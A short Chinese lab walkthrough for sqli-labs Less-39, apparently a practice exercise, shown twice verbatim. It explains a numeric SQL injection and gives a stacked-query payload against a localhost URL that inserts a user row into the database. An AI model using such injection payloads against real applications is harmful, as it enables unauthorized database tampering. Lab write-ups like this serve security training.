和less-38的区别在于sql语句的不一样:SELECT * FROM users WHERE id=$id LIMIT 0,1
也就是数字型注入,我们可以构造以下的payload:
http://127.0.0.1/sql/Less-39/index.php?id=1;insert into users(id,username,password) values ('39','less39','hello')--+
通过数据表中可以看到添加的less-39项。
和less-38的区别在于sql语句的不一样:SELECT * FROM users WHERE id=$id LIMIT 0,1
也就是数字型注入,我们可以构造以下的payload:
http://127.0.0.1/sql/Less-39/index.php?id=1;insert into users(id,username,password) values ('39','less39','hello')--+
通过数据表中可以看到添加的less-39项。